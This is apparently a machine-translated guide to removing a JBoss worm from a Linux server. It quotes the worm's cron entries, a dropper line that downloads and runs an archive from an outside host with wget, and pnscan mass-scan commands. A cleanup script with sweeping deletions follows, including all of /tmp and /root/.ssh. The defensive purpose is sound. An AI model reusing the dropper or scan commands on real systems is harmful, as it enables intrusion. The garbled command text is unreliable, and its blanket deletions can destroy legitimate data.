Steps to clean up the jboss Worm

Multiple objects starting with begin. Currently, the application cannot be upgraded to jboss (the test fails), but can only be processed temporarily.
1. If a user running in jboss has a virus scheduled download task, download the virus file through wget through the scheduled task, decompress it, and run it.
[Root @ localhost tmp] # crontab-l
1 1 10 **/root/. sysdbs
1 1 1 **/bin/sh/root/. toor. sh
1 1 1 **/root/. toor. sh
1 1 10 **/root/. sysdbs
[Root @ localhost tmp] # more/root/. toor. sh
Cd/tmp; wget http://backups.strangled.net/a.tar.gz;tar xzvf a.tar.gz; perl B. pl; python c. py
[Root @ localhost bin] # cd $ JBOSS/bin
[Root @ localhost bin] # tar-tvf kisses.tar.gz
-Rw-r -- toughc/toughc 1686 2002-03-26 00:39:14 Makefile
-Rw-r -- toughc/toughc 3229 2002-03-26 00:34:47 bm. c
-Rw-r -- toughc/toughc 460 2002-03-23 21:54:55 bm. h
-Rw-r -- toughc/toughc 2939 2011-10-22 13:38:51 flu. pl
-Rwxr-xr-x toughc/toughc 5598 06:25:47 install-sh
-Rwxr-xr-x toughc/toughc 132 2002-03-22 23:05:15 ipsort
-Rw-r -- toughc/toughc 4337 2011-10-22 13:38:01 linda. pl
-Rw-r -- toughc/toughc 20211 2002-03-26 00:37:04 pnscan. c
-Rw-r -- toughc/toughc 25 00:53:11 version. c
[Root @ localhost tmp] # find/-name pnscan
/Tmp/zsa/pnscan
/Usr/local/jboss-4.2.3.GA/bin/pnscan
[Root @ localhost tmp] # ps-ef | grep pnscan
Root 754 21540 0 00:00:00 pts/3 grep pnscan
Root 1003 32088 0? 00:00:00 sh-c./pnscan-r JBoss-w "HEAD/HTTP/1.0 \ r \ n"-t 6500 150.34.0.0/16 80>/tmp/sess_0088025413980486928597bf150
Root 1009 1003 0? 00:00:00./pnscan-r JBoss-w HEAD/HTTP/1.0 \ r \ n-t 6500 150.34.0.0/16 80
Root 24553 527 0? 00:00:00 sh-c./pnscan-r JBoss-w "HEAD/HTTP/1.0 \ r \ n"-t 6500 180.139.0.0/16 80>/tmp/sess_0088025413980486928597bf180
Root 24558 24553 0? 00:00:00./pnscan-r JBoss-w HEAD/HTTP/1.0 \ r \ n-t 6500 180.139.0.0/16 80
 
 
 
2. Through code analysis, multiple pnscan and/usr/share/jboss/tomcat processes appear in the system, the virus disguised the virus program as running the/usr/share/jboss/tomcat process. It is actually called by the perl program and can be found through top.
3. Clean up the virus. Because of the virus program, first stop the virus and then delete the virus program. Here is the Virus Cleaning script.
[Root @ localhost tmp] # more/tmp/killpnscan. sh
#/Usr/bin/sh
# Run the cleanup virus in the memory. If pnscan is not cleaned, manually kill the process.
Crontab-l
Killall pnscan
Killall perl
 
# Deleting a Virus File
Cd/usr/local/jboss-4.2.3.GA/bin/
Rm-fr kiss *
Rm-f flu. pl
Rm-f bm .*
Rm-f javadd.tar.gz
Rm-f javadd.tar.gz *
Rm-f lind ?. Pl
Rm-f Makefile
Rm-f nohup. out
Rm-f pnscan *
Rm-f version .*
Rm-f install-sh
Rm-f ipsort
Rm-f jdb.tar.gz *
Rm-f fly. pl
Rm-f sysdbss *
Rm-f treat. sh
Rm-f/root/. ssh /*
Rm-f goodknight .*
 
# Deleting viruses in the temporary file directory
Cd/tmp
Rm-fr/tmp/. lime
Rm-fr/tmp/za
Rm-fr/tmp/zsa
Rm-f/tmp /*
 
Rm-fr/tmp/flu
Rm-fr/root/. sysdbs
Rm-fr/root/. toor. sh # confirm cleanup again
Killall pnscan
Killall perl
Ps-ef | grep pnscan
Ps-ef | grep tomcat
Crontab-r
4. At this point, the virus file is cleaned up. We recommend that you uninstall wget because it is downloaded and run through wget.
Rpm-e wget attachment:
Therefore, the affected version of the worm caused by tomcat is as follows:
 
JBoss Application Server (AS) 4.0.x
JBoss Communications Platform 1.2
JBoss Enterprise Application Platform (EAP) 4.2, 4.3, 5.0
JBoss Enterprise Portal Platform (EPP) 4.3
JBoss Enterprise Web Platform (EWP) 5.0
JBoss SOA-Platform (SOA-P) 4.2, 4.3, 5.0


From the online world